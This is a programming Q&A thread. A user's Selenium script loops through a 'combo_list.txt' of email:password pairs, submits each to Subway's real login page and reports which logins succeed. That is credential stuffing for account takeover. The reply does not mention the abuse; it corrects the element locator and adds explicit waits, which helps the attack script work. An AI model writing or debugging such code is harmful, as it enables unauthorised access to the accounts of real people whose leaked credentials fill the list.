# Finding correct method for subway login page?

Tags: selenium, authentication

Every method for the email and password method I've tried for the subway login page hasn't worked.
I have tried:

```
email_element = driver.find_element_by_xpath("//input[@class='signInName']")
```

have tried:

```
email_element = driver.find_element_by_css_selector("input#signInName.invalid")
```

But none have entered in the email and password and instead stops at the login page and gives an error in the console.

Code is:

```
from selenium import webdriver

# Create a webdriver instance
driver = webdriver.Chrome()

# Navigate to the Subway login page

driver.get("https://id.subway.com/02d64b66-5494-461d-8e0d-5c72dc1efa7f/oauth2/v2.0/authorize?p=b2c_1a_signup_signin-r2&ui_locales=en-US&client_id=502546f5-a6d5-48ed-be47-6c7a5c984770&redirect_uri=https%3A%2F%2Fwww.subway.com%2F&response_type=code%20id_token&scope=openid&state=OpenIdConnect.AuthenticationProperties%3D1JWM2VDAuakyP_T24rr9fP56K_DvTf6l7yUC5cKN487qrptX3u3wgYBHuBJDXr_mjVgbnBaLARUiOcZmORpp5B__pvjczmP2bgFcEUtQ2CebtvnCktzsRD0MJU7ixoyjL-EOkBTniaGDSHaeiD3YLFTH6hKRHYSfk81HzXKd7YpCKBE4dS-6J05CacgBjN7PDSa9c68WZZ5gtr-v87d3PS4yTLYs8_KoJW1wychylie38WTGXFKr4esn1MBwSi3jSTfTBQmRUpVOi48Pxxa0nkQ3rwM&response_mode=form_post&nonce=638068963052811029.MWU1OGI1YzMtMDFhMy00MmRhLTg2M2YtYjA4MzlhZTYxZmJhNDg2NDAwZTgtYjczMy00YmJjLTkzMTctMGYxYzc0NjQ0MmVk&x-client-SKU=ID_NET461&x-client-ver=5.3.0.0")


with open("combo_list.txt", "r") as f:
    lines = f.readlines()

# Iterate through the list

for line in lines:
    # Split the line into email and password
    email, password = line.strip().split(":")

    # Find the email and password input elements using Xpath
    email_element = driver.find_element_by_xpath("//input[@class='signInName']")
    password_element = driver.find_element_by_xpath("//input[@name='password']")


    # Clear the input fields
    email_element.clear()
    password_element.clear()

    # Enter the email and password
    email_element.send_keys(email)
    password_element.send_keys(password)

    # Submit the form
    driver.find_element_by_css_selector(".btn.btn-primary").click()
    
    # Check if login was successful
    if "Welcome" in driver.page_source:
        print(f"Successful login with email {email} and password {password}")
    else:
        print(f"Failed login with email {email} and password {password}")

# Close the webdriver instance
driver.close()
```

Answer (score 0):

**Why is your code failing?:**

You are trying to locate your element with this xpath: `//input[@class='signInName']`, which is wrong, `signInName` is not the class, is the id, so your xpath should be `//input[@id='signInName']`

**How to improve your code to make it reliable?**

Import following libs:

```
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium import webdriver
```

Then try this:

```
email = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, "//input[@id='signInName']")))
email.send_keys(email)
```

And same way for every element

**Explanation:**

It will wait for the element until is located in the DOM.

**Litle working example with your page:**

```
# Needed libs
import time
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium import webdriver

# Creating the driver and navigate
driver = webdriver.Chrome()
url = "https://id.subway.com/02d64b66-5494-461d-8e0d-5c72dc1efa7f/oauth2/v2.0/authorize?p=b2c_1a_signup_signin-r2&ui_locales=en-US&client_id=502546f5-a6d5-48ed-be47-6c7a5c984770&redirect_uri=https%3A%2F%2Fwww.subway.com%2F&response_type=code%20id_token&scope=openid&state=OpenIdConnect.AuthenticationProperties%3D1JWM2VDAuakyP_T24rr9fP56K_DvTf6l7yUC5cKN487qrptX3u3wgYBHuBJDXr_mjVgbnBaLARUiOcZmORpp5B__pvjczmP2bgFcEUtQ2CebtvnCktzsRD0MJU7ixoyjL-EOkBTniaGDSHaeiD3YLFTH6hKRHYSfk81HzXKd7YpCKBE4dS-6J05CacgBjN7PDSa9c68WZZ5gtr-v87d3PS4yTLYs8_KoJW1wychylie38WTGXFKr4esn1MBwSi3jSTfTBQmRUpVOi48Pxxa0nkQ3rwM&response_mode=form_post&nonce=638068963052811029.MWU1OGI1YzMtMDFhMy00MmRhLTg2M2YtYjA4MzlhZTYxZmJhNDg2NDAwZTgtYjczMy00YmJjLTkzMTctMGYxYzc0NjQ0MmVk&x-client-SKU=ID_NET461&x-client-ver=5.3.0.0"
driver.get(url)
driver.maximize_window()

# Write the email into the input
email_element = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, "//input[@id='signInName']")))
email_element.send_keys("hello@hello.xom")

# This line will only stop the execution and you will be able to verify it did what you wanted, but you can delete this line
time.sleep(10)
```

**Docs help:**

- Docs for WebdriverWait: [WebdriverWait](https://www.selenium.dev/selenium/docs/api/java/org/openqa/selenium/support/ui/WebDriverWait.html)
- Docs for Expected conditions (EC): [Expected conditions](https://www.selenium.dev/selenium/docs/api/py/webdriver_support/selenium.webdriver.support.expected_conditions.html)
- Docs for By: [By](https://selenium-python.readthedocs.io/locating-elements.html)